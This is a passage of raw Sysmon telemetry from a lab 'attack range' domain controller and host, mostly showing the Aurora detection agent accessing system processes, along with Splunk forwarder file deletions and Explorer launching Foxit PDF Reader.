10341000x800000000000000040314Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:14.855{FE4C2B44-DE08-63C7-F104-00000000AF02}60686124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E318-63C7-EF05-00000000AF02}5628C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.5351_none_7f0b8fbe21ea4a21\TiWorker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600610) 10341000x800000000000000040313Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:14.854{FE4C2B44-DE08-63C7-F104-00000000AF02}60686124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E318-63C7-EE05-00000000AF02}3480C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600610) 10341000x800000000000000040312Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:14.853{FE4C2B44-DE08-63C7-F104-00000000AF02}60686124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600610) 10341000x800000000000000040311Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:14.852{FE4C2B44-DE08-63C7-F104-00000000AF02}60686124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600610) 10341000x800000000000000040310Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:14.852{FE4C2B44-DE08-63C7-F104-00000000AF02}60686124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600610) 10341000x800000000000000040309Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:14.849{FE4C2B44-DE08-63C7-F104-00000000AF02}60686124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E02A-63C7-4705-00000000AF02}4708C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600610) 10341000x800000000000000040308Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:14.842{FE4C2B44-DE08-63C7-F104-00000000AF02}60686124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600610) 10341000x800000000000000040307Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:14.822{FE4C2B44-DE08-63C7-F104-00000000AF02}60686124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600610) 10341000x800000000000000040306Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:14.793{FE4C2B44-DE08-63C7-F104-00000000AF02}60686124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600610) 10341000x800000000000000040305Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:14.787{FE4C2B44-DE08-63C7-F104-00000000AF02}60686124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600610) 10341000x800000000000000040304Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:14.779{FE4C2B44-DE08-63C7-F104-00000000AF02}60686124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600610) 23542300x800000000000000040303Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:14.779{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BBABE61AC3B31E757FBDE786DDA4F77C,SHA256=88694B2D7AF3C72FBE83CFE067F0022E4DEB19C253E23B711F28DF3C07F53AE0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000040302Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:14.774{FE4C2B44-DE08-63C7-F104-00000000AF02}60686124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600610) 10341000x800000000000000040301Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:14.772{FE4C2B44-DE08-63C7-F104-00000000AF02}60686124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600610) 10341000x800000000000000040300Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:14.770{FE4C2B44-DE08-63C7-F104-00000000AF02}60686124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600610) 10341000x800000000000000040299Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:14.768{FE4C2B44-DE08-63C7-F104-00000000AF02}60686124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600610) 10341000x800000000000000040298Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:14.765{FE4C2B44-DE08-63C7-F104-00000000AF02}60686124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600610) 10341000x800000000000000040297Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:14.764{FE4C2B44-DE08-63C7-F104-00000000AF02}60686124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600610) 10341000x800000000000000040296Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:14.761{FE4C2B44-DE08-63C7-F104-00000000AF02}60686124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600610) 10341000x800000000000000040295Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:14.760{FE4C2B44-DE08-63C7-F104-00000000AF02}60686124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600610) 10341000x800000000000000040294Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:14.759{FE4C2B44-DE08-63C7-F104-00000000AF02}60686124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600610) 10341000x800000000000000040293Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:14.758{FE4C2B44-DE08-63C7-F104-00000000AF02}60686124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600610) 10341000x800000000000000040292Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:14.756{FE4C2B44-DE08-63C7-F104-00000000AF02}60686124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600610) 10341000x800000000000000040291Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:14.253{FE4C2B44-DE08-63C7-F104-00000000AF02}60686124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600610) 10341000x800000000000000040290Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:14.252{FE4C2B44-DE08-63C7-F104-00000000AF02}60686124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600610) 23542300x800000000000000015426Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:15.933{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8EA4DFB2EECF6C5CF133A2618DD27164,SHA256=3F1B2E59C51AEE76FE7431927B3A2FACD64FFD12264AD74A22F1E996C4F8D3B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040316Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:15.839{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C62FAD52D2DA3D9BAFE98F0864A403EC,SHA256=E6E752C99130ED7DB8C65CE2888DB0A0BF55EBDF2D9B24DD99A9C6BB7249EA10,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000040324Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:16.923{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29EE8DD109B86FE21862BF55B2B5D1EF,SHA256=A5FBAF23397E6CDC60454AB3DCD77AA99B7A239F34572AC30C57D380B40F0F1A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015427Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:16.372{E5A8D418-DC43-63C7-1200-00000000B002}1012NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=E7AFA33D1716F61B6A0D77BBD0EF2B2B,SHA256=4CA06DDCD1C17305378E3F892728131695179BB4CAC5ABABAEA02E94461746D8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000040323Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:16.035{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005288C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040322Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:16.035{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005288C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040321Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:16.035{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005288C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040320Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 